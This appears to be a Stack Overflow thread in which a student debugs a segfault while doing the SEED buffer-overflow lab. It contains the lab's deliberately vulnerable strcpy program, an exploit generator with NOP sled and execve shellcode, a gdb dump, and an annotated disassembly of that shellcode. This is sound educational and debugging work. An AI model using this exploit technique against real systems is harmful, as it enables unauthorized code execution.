# Segmentation faults in stack-based buffer overflow

Tags: c, assembly, x86, buffer-overflow, exploit

I was doing the SEED lab on buffer overflows which has the following vulnerable code:

```
/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[24];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```

I am trying to fill it with a 517 byte buffer which I put into `badfile`. The problem is I keep getting segmentation faults, even though the memory layout looks correct.

```
/* exploit.c */
void main(int argc, char **argv)
{
    char buffer[SIZE];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, SIZE);

    /* You need to fill the buffer with appropriate contents here */ 

    int i;
    long* ptr = (long*) buffer;
    for(i = 0; i < 16; i++)
        *(ptr+i) = EBP+64;      // this is the jump spot

    memcpy(buffer+128, shellcode, sizeof(shellcode));   // copy the shellcode

    for(i = 128+sizeof(shellcode); i < SIZE; i++)
        *(buffer+i) = 0x0;      // end the string with nul characters

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, SIZE, 1, badfile);
    fclose(badfile);
}
```

The memory layout when running the vulnerable program is this:

```
(gdb) x/64x buffer
0xbffff0e8: 0xbffff148  0xbffff148  0xbffff148  0xbffff148
0xbffff0f8: 0xbffff148  0xbffff148  0xbffff148  0xbffff148
0xbffff108: 0xbffff148  0xbffff148  0xbffff148  0xbffff148
0xbffff118: 0xbffff148  0xbffff148  0xbffff148  0xbffff148
0xbffff128: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff138: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff148: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff158: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff168: 0x6850c031  0x68732f2f  0x69622f68  0x50e3896e
0xbffff178: 0x99e18953  0x80cd0bb0  0x90909000  0x90909090
0xbffff188: 0x90909090  0x90909090  0x90909090  0x90909090
0xbffff198: 0x90909090  0x90909090  0x90909090  0x31909090
0xbffff1a8: 0x2f6850c0  0x6868732f  0x6e69622f  0x5350e389
0xbffff1b8: 0xb099e189  0x0080cd0b  0x00000000  0x00000000
0xbffff1c8: 0x00000000  0x00000000  0x00000000  0x00000000
0xbffff1d8: 0x00000000  0x00000000  0x00000000  0x00000000
(gdb) x/2x $ebp
0xbffff108: 0xbffff148  0xbffff148
(gdb) x/x 0xbffff148
0xbffff148: 0x90909090
```

Yet when I run it, I get a segmentation fault. Why does this happen and why do the NOPs at the end of the overflowing buffer not get replaced by 0x0s?

**UPDATE:  The memory is part of stack.c after I enter bof and copy the string.**

Comment: Can you use gdb to determine the instruction that is causing the segfault?

Comment: Are you sure the shellcode is x86-64?  It looks like 32-bit code, not 64-bit code.

Comment: This is 32-bit code

Comment: Then why the `x86-64` tag?

Comment: Oh, looks like the tag was added by @Michael Petch

Comment: Sorry about that. fixed. That was my bad @JakeKing

Comment: This isn't a [mcve].  Your `exploit.c` doesn't contain the `shellcode`, and doesn't define `EBP`.  Also, what instruction segfaults?  You're already using gdb, add this info to the question! (Along with register values at the segfault.)

Answer (score 1):

Is that dump from running `exploit.c` or `stack.c`?  The fact that there's a NUL byte in the dump at `0xbffff180` implies that this is `exploit.c`, because the `strcpy` in `stack.c` would have stopped copying at the NUL byte.  If this is the case, then the value of `$ebp` in `exploit.c` is meaningless.  You need to get the value that `$ebp` will be when it's in `bof` in `stack.c`.  It is likely that `$ebp` has a different value when running in `stack.c`, which causes execution to jump to garbage.

Just for grins, I disassembled and annotated the shellcode, although the addresses are likely not correct when running in `stack.c`:

```
  0xbffff168:   31 c0                   xor    %eax,%eax    ; eax <- 0
  0xbffff16a:   50                      push   %eax         ; stack <- "\0\0\0"
  0xbffff16b:   68 2f 2f 73 68          push   $0x68732f2f  ; stack <- "//sh\0\0\0"
  0xbffff170:   68 2f 62 69 6e          push   $0x6e69622f  ; stack <- "/bin//sh\0\0\0"
  0xbffff175:   89 e3                   mov    %esp,%ebx    ; ebx = "/bin//sh\0\0\0" -- filename
  0xbffff177:   50                      push   %eax         ; stack <- 0
  0xbffff178:   53                      push   %ebx         ; stack <- "/bin//sh\0\0\0", 0
  0xbffff179:   89 e1                   mov    %esp,%ecx    ; ecx = {"/bin//sh\0\0\0", 0} -- argv
  0xbffff17b:   99                      cltd                ; edx <- 0 -- envp
  0xbffff17c:   b0 0b                   mov    $0xb,%al     ; al <- 0xb -- sys_execve
  0xbffff17e:   cd 80                   int    $0x80        ; sys call
```

The code is essentially doing:

```
char filename[] = "/bin//sh";
char *args[2];
args[0] = filename;
args[1] = NULL;
execve(filename, args, NULL);
```

Odd that there are 2 slashes in the filename.  The NUL terminator could have been included in the first of the two pushed constants, eliminating the need for the first `push %eax`.

Comment: Most shellcode needs to avoid having any its own bytes be `0`, because it usually needs to be copied by `strcpy` or similar as part of the buffer overflow, so it has to be a C implicit-length string.  This means that they need to generate any `0` bytes instead of including them literally as parts of constants, e.g. with xor-zeroing, or with sign-extension of a `push imm8`.  (Or in 64-bit code, from a `push imm32`

Comment: Anyway, that's why they pad `/bin/sh` out to `/bin//sh`, 8 bytes.

Comment: Ah, that makes sense